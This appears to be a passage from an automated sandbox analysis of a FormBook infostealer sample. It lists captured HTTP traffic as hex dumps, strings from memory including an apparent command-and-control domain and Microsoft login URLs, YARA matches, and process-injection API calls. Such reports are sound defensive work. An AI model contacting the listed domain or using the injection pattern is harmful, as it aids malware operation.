Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 06 Feb 2025 07:53:59 GMTContent-Type: text/html; charset=utf-8Vary: Accept-EncodingContent-Encoding: gzipX-Cache: MISS from sg1-cdnb135-013Transfer-Encoding: chunkedConnection: closeData Raw: 39 63 36 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ed 5d fb 73 1b 45 9e ff f9 ae ea fe 87 3e 91 5d c9 20 8d de b6 ac d8 ae 53 64 d9 56 b0 25 45 92 9d 17 59 d7 68 d4 92 06 8f 66 c4 cc c8 b6 02 a9 82 7d 00 5b 45 96 e5 d8 47 b8 63 8f 0b ec 2e d4 52 1b 76 b9 3b 60 81 b0 ff 4c e4 38 3f ed bf 70 df 9e 97 7a 1e 92 45 60 d6 d6 1d 72 25 d2 f4 74 7f bb fb d3 df 57 7f 7b a6 7b e9 9f 57 cb f9 fa d5 4a 01 75 d4 ae b0 f2 4f ff b8 64 7d 63 b6 09 d7 08 3e 4b 5d ac b2 88 eb b0 b2 82 d5 e5 c0 76 7d 2d 92 09 98 f7 54 5e 15 f0 4a 6d a0 a8 b8 8b 0a b2 2c c9 4b 51 3d 8d 2e 2c b2 5d bc 1c 90 a5 86 a4 2a 01 c4 49 a2 8a 45 20 25 4a bc d8 c4 87 61 51 6a 49 82 20 1d 04 50 d4 56 a7 5e 6c 9f c7 07 3d 49 56 a9 82 07 7c 53 ed 2c 37 f1 3e cf e1 88 76 11 46 bc c8 ab 3c 2b 44 14 8e 15 f0 72 3c 8c fa 0a 96 b5 2b b6 01 09 a2 64 b5 59 51 07 d0 66 bd 7d a4 83 d1 27 d1 05 56 c1 e8 c9 e8 28 ad 21 35 07 e8 f9 d1 35 c9 c7 49 82 24 67 d1 13 c9 64 f2 bc fd 4e 0b 7a 94 45 f1 54 ef 10 ed 60 b9 c9 8a 6c 18 05 36 b0 b0 8f 55 9e 63 51 09 f7 71 20 8c 3a 66 42 18 e5 64 68 6a 18 05 b7 78 4e 96 14 a9 a5 a2 ab ec 06 e6 83 61 a4 b0 a2 12 81 96 f3 2d 47 1d 5d 56 6e f3 62 16 c5 1c e9 3d b6 d9 e4 c5 36 dc 40 89 18 34 80 fc e7 c8 72 20 c9 cd 48 43 c6 ec 5e 16 69 5f 11 92 42 65 ba 35 ea 4e 27 ee e8 b5 59 6f 9c 10 8f b9 aa 27 5d 8f 28 fc 4d 9c 45 89 8c ab 66 ed ee 01 e6 db 1d c0 27 1d 73 b6 5d e0 45 1c e9 18 b7 93 09 5b 71 ba 4d 89 31 23 91 4a 64 32 1c f6 18 0c ab ce 94 ab 4e 0b af 79 d2 9f 31 20 6b f7 5c 77 a9 be c6 dd 7d 6d 00 a6 c0 71 c0 e3 aa d4 05 6e 00 12 8a 24 f0 4d f4 04 c6 74 1b e9 8e 25 19 a5 df e8 80 ac c1 08 8e 63 37 cf 4e 9a a3 32 a1 a1 26 ec 76 08 6c b5 8f 1b 6a fb 48 10 de a7 bb 0e 75 4e 82 bc 21 09 63 78 8b 6d 34 64 e7 48 f6 65 85 08 15 c8 46 cf 41 54 c5 87 6a a4 89 39 49 66 55 5e 02 ce ef 83 b2 90 09 cb 4c ce 18 d1 e4 3b 8b 9a 30 10 78 5c 4b 9c cd 30 44 3b 33 4f fe 1c f4 39 a3 8d 3d 50 57 2a 96 a9 bb 14 98 6c b6 23 ed 63 67 f7 a6 ea 03 45 85 d1 24 02 13 3d ea 68 61 83 e5 f6 da b2 04 18 80 06 6a 65 b8 06 d7 b0 37 64 24 c2 0c e6 3a 12 52 89 da 73 f2 94 a6 2b 81 37 63 b1 ef 4d 2e dd 93 5d 65 2d c1 89 bb 19 80 74 bd 05 1a 3c 8b d8 be 2a 39 f0 a3 78 27 93 a6 eb 25 8c 65 53 01 71 26 95 76 14 1e f5 3b 62 ea df d6 02 f9 73 e6 d3 a4 cf ad 1e 0d a9 94 41 c4 fa 4a 16 25 bd 79 b7 c5 76 79 61 90 45 79 49 04 99 65 15 50 df 9b 7c 03 eb 9c 87 b6 24 b0 1e 61 b4 85 45 41 0a 43 9e be cc 63 39 8c ba 90 ac f4 58 9b 02 82 b1 74 0e 04 81 72 05 4d 02 74 9c 16 a2 d3 29 26 01 7b b5 c9 0e a4 be 6a b3 58 0c c0 13 e9 36 23 c9 31 63 9e b0 41 4f f3 9c 51 70 71 4c c1 85 71 05 af 73 80 94 f2 83 e5 80 41 20 70 c3 49 01 58 82 05 c5 2f e0 96 ea 2d 35 0c 27 60 56 6e f1 87 ce 92 5a 7a 16 74 69 c7 bb e0 bf 74 71 93 67 91 24 0a 03 a4 70 32 c6 22 1a e1 ce 8a 4d 14 ea f2 22 68 8f 91 87
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 06 Feb 2025 07:54:01 GMTContent-Type: text/html; charset=utf-8Vary: Accept-EncodingContent-Encoding: gzipX-Cache: MISS from sg1-cdnb135-013Transfer-Encoding: chunkedConnection: closeData Raw: 39 63 36 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ed 5d 79 73 23 c7 75 ff 3b a9 ca 77 e8 d0 1b 83 2b 11 33 b8 09 72 49 56 70 0c 0e 12 17 71 f1 58 ad 59 83 c1 00 18 62 30 03 ce 0c 40 80 92 aa e4 4b 92 ab 24 cb 8a af 55 e2 c4 91 e5 d8 2a bb bc b2 9d c4 92 25 ad fc 65 16 dc dd bf f2 15 f2 7a 30 03 cc 05 12 92 0d 2f 91 08 5b 12 81 9e ee d7 dd bf 7e 57 bf ee e9 de fa fb 78 3e 56 3e 2a 50 a8 a5 74 f8 9d bf fb db ad c9 5f 96 ae c3 6f 04 9f ad 0e ab d0 88 69 d1 92 cc 2a db 2b 95 72 c2 1d 5e d1 9f 29 9c c2 b3 3b a5 a1 ac b0 1d 44 49 92 28 6d 91 e3 34 63 61 81 ee b0 db 2b 92 58 13 15 79 05 31 a2 a0 b0 02 90 12 44 4e a8 b3 83 35 41 6c 88 3c 2f 9e af 20 d2 54 e7 b8 58 9f 63 cf bb a2 a4 18 0a 9e 73 75 a5 b5 5d 67 fb 1c c3 ba d5 1f 6b 88 13 38 85 a3 79 b7 cc d0 3c bb ed 5d 43 3d 99 95 d4 5f 74 0d 12 04 71 d2 66 59 19 42 9b c7 ed c3 1d 24 9f 43 51 5a 66 d1 73 e4 34 ad 26 d6 87 e8 c5 e9 6f 9c 8f 11 79 51 da 44 5f f1 fb fd 77 cc 4f 1a d0 a3 4d e4 0d 74 07 a8 ca 4a 75 5a a0 d7 d0 4a 8a e5 fb ac c2 31 34 ca b1 3d 76 65 0d b5 f4 84 35 14 91 a0 a9 6b c8 95 e5 18 49 94 c5 86 82 8e e8 14 cb b9 d6 90 4c 0b b2 1b 5a ce 35 2c 75 74 68 a9 c9 09 9b c8 63 49 ef d2 f5 3a 27 34 e1 01 f2 79 a0 01 f8 7f 96 2c e7 a2 54 77 d7 24 96 6e 6f 22 f5 8f 1b a7 18 32 bd 3c ed 4e cb 6b e9 b5 5e af 17 13 f7 d8 aa c7 5d 77 cb dc 05 bb 89 7c 61 5b cd ea d3 73 96 6b b6 00 9f a0 c7 da 76 9e 13 58 77 4b 7b ec f7 99 8a 1b db e4 9b 31 12 01 5f 38 cc b0 0e 83 31 a9 33 60 ab 73 82 57 08 f7 67 06 c8 ea 33 db 53 43 5f bd f6 be d6 00 53 e0 38 e0 71 45 ec 00 37 00 09 59 e4 b9 3a fa 0a cb 1a db 68 ec 98 9f 90 7b b5 16 c8 1a 8c e0 2c 76 73 ec a4 3e 2a 57 34 54 87 dd 0c 81 a9 f6 59 43 6d 1e 09 cc fb c6 ae 43 9d 57 41 5e 13 f9 19 bc 45 d7 6a 92 75 24 7b 92 8c 85 0a 64 a3 6b 21 aa b0 03 c5 5d 67 19 51 a2 15 4e 04 ce ef 81 b2 90 30 cb 5c 9d d1 ad ca f7 26 aa c3 40 b0 b3 5a 62 6d 86 26 da e1 10 fe 67 a1 cf 68 6d ec 82 ba 52 58 c9 f0 d4 00 26 bd d9 12 fb ac b5 7b 73 f5 c1 40 85 50 25 82 c5 7a d4 d2 c2 1a cd b4 9b 92 08 18 80 06 6a 84 99 1a 53 33 37 64 2a c2 04 cb b4 44 a4 60 b5 67 e5 29 55 57 02 6f 7a 3c ff 70 75 e9 ae 64 2b 3b 11 1c af 9d 01 70 d7 1b a0 c1 37 11 dd 53 44 0b 7e 06 de 09 07 8d f5 62 c6 32 a9 00 2f 11 08 5a 0a 4f fb ed d6 f5 6f 63 1d ff b3 e6 53 a5 cf ae 1e 35 a9 94 40 c4 7a f2 26 f2 3b f3 6e 83 ee 70 fc 70 13 c5 44 01 64 96 96 41 7d 67 b8 1a 3b e6 3c 94 15 c1 7a ac a1 2c 2b f0 e2 1a e4 e9 49 1c 2b ad a1 0e 24 cb 5d da a4 80 60 2c ad 03 81 a1 dc 41 57 01 3a 4b 0b 19 d3 0d 4c 02 f6 2a 43 0f c5 9e 62 b2 58 04 c0 e3 ee d4 dd fe 19 63 ee 33 41 6f e4 39 ad e0 c6 8c 82 eb b3 0a de 65 00 29 f9 6b db 2b 1a 81 95 7b 56 0a c0 12 34 28 7e 9e 6d 28 ce 52 43 30 3c 4b 4b 0d 6e 60 2d a9 a6 6f 82 2e 6d 39 17 fc c7 0e 5b e7 68 24 0a fc 10 c9 8c c4 b2 02 9a e2 4e 0b 75
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 06 Feb 2025 07:54:04 GMTContent-Type: text/html; charset=utf-8Vary: Accept-EncodingX-Cache: MISS from sg1-cdnb135-013Transfer-Encoding: chunkedConnection: closeData Raw: 66 32 65 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 53 79 73 74 65 6d 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f 22 3e 0d 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 2f 2a 20 42 61 73 65 20 2a 2f 0d 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 33 33 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 3a 20 31 34 70 78 20 56 65 72 64 61 6e 61 2c 20 22 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 22 2c 20 68 65 6c 76 65 74 69 63 61 2c 20 41 72 69 61 6c 2c 20 27 4d 69 63 72 6f 73 6f 66 74 20 59 61 48 65 69 27 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 20 32 30 70 78 20 32 30 70 78 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 77 6f 72 64 2d 62 72 65 61 6b 3a 20 62 72 65 61 6b 2d 77 6f 72 64 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 68 31 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 31 30 70 78 20 30 20 30 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 38 70 78 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 35 30 30 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 33 32 70 78 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 68 32 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 34 32 38 38 63 65 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 34 30 30 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 36 70 78 20 30 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 36 70 78 20 30 20 30 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 38 70 78 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 65 65 65 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 68 33 2e 73 75 62 68 65 61 64 69 6e 67 20 7b 0d 0a 20 20 20 20 20
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 06 Feb 2025 07:54:37 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 06 Feb 2025 07:54:42 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 06 Feb 2025 07:54:46 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>

Source: qxXd7JaCvGdKUp8.exe, 00000000.00000002.2127976385.0000000002645000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: iKfhbNmgVEQKZlbl.exe, 0000000B.00000002.3324905749.0000000005106000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.dynavision.website
Source: iKfhbNmgVEQKZlbl.exe, 0000000B.00000002.3324905749.0000000005106000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.dynavision.website/ov9p/
Source: AtBroker.exe, 0000000A.00000002.3323972485.0000000005288000.00000004.10000000.00040000.00000000.sdmp, iKfhbNmgVEQKZlbl.exe, 0000000B.00000002.3323109583.0000000003378000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://www.thinkphp.cn
Source: AtBroker.exe, 0000000A.00000002.3326098649.00000000077D8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: AtBroker.exe, 0000000A.00000002.3326098649.00000000077D8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: AtBroker.exe, 0000000A.00000002.3326098649.00000000077D8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: AtBroker.exe, 0000000A.00000002.3326098649.00000000077D8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: AtBroker.exe, 0000000A.00000002.3326098649.00000000077D8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: AtBroker.exe, 0000000A.00000002.3326098649.00000000077D8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: AtBroker.exe, 0000000A.00000002.3326098649.00000000077D8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: AtBroker.exe, 0000000A.00000002.3321572737.0000000000608000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
Source: AtBroker.exe, 0000000A.00000002.3321572737.0000000000608000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
Source: AtBroker.exe, 0000000A.00000002.3321572737.0000000000608000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
Source: AtBroker.exe, 0000000A.00000002.3321572737.0000000000608000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
Source: AtBroker.exe, 0000000A.00000002.3321572737.0000000000608000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
Source: AtBroker.exe, 0000000A.00000002.3321572737.0000000000631000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
Source: AtBroker.exe, 0000000A.00000003.2595044704.000000000770D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
Source: AtBroker.exe, 0000000A.00000002.3326098649.00000000077D8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: AtBroker.exe, 0000000A.00000002.3325919991.0000000007480000.00000004.00000800.00020000.00000000.sdmp, AtBroker.exe, 0000000A.00000002.3323972485.00000000050F6000.00000004.10000000.00040000.00000000.sdmp, iKfhbNmgVEQKZlbl.exe, 0000000B.00000002.3323109583.00000000031E6000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.google.com

E-Banking Fraud

Yara detected FormBook

Source: Yara match	File source: 6.2.qxXd7JaCvGdKUp8.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.qxXd7JaCvGdKUp8.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000A.00000002.3323139781.00000000042E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.3324905749.00000000050A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2400453269.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.3322974349.0000000003BB0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2401086517.0000000001160000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2402429418.0000000002030000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.3322856806.00000000008A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.3321297429.00000000004B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY

Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_0042CB43 NtClose,	6_2_0042CB43
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_01252B60 NtClose,LdrInitializeThunk,	6_2_01252B60
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_01252DF0 NtQuerySystemInformation,LdrInitializeThunk,	6_2_01252DF0
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_01252C70 NtFreeVirtualMemory,LdrInitializeThunk,	6_2_01252C70
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_012535C0 NtCreateMutant,LdrInitializeThunk,	6_2_012535C0
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_01254340 NtSetContextThread,	6_2_01254340
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_01254650 NtSuspendThread,	6_2_01254650
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_01252BA0 NtEnumerateValueKey,	6_2_01252BA0
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_01252B80 NtQueryInformationFile,	6_2_01252B80
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_01252BE0 NtQueryValueKey,	6_2_01252BE0
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_01252BF0 NtAllocateVirtualMemory,	6_2_01252BF0
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_01252AB0 NtWaitForSingleObject,	6_2_01252AB0
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_01252AF0 NtWriteFile,	6_2_01252AF0
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_01252AD0 NtReadFile,	6_2_01252AD0
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_01252D30 NtUnmapViewOfSection,	6_2_01252D30
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_01252D00 NtSetInformationFile,	6_2_01252D00
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_01252D10 NtMapViewOfSection,	6_2_01252D10
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_01252DB0 NtEnumerateKey,	6_2_01252DB0
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_01252DD0 NtDelayExecution,	6_2_01252DD0
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_01252C00 NtQueryInformationProcess,	6_2_01252C00
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_01252C60 NtCreateKey,	6_2_01252C60
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_01252CA0 NtQueryInformationToken,	6_2_01252CA0
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_01252CF0 NtOpenProcess,	6_2_01252CF0
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_01252CC0 NtQueryVirtualMemory,	6_2_01252CC0
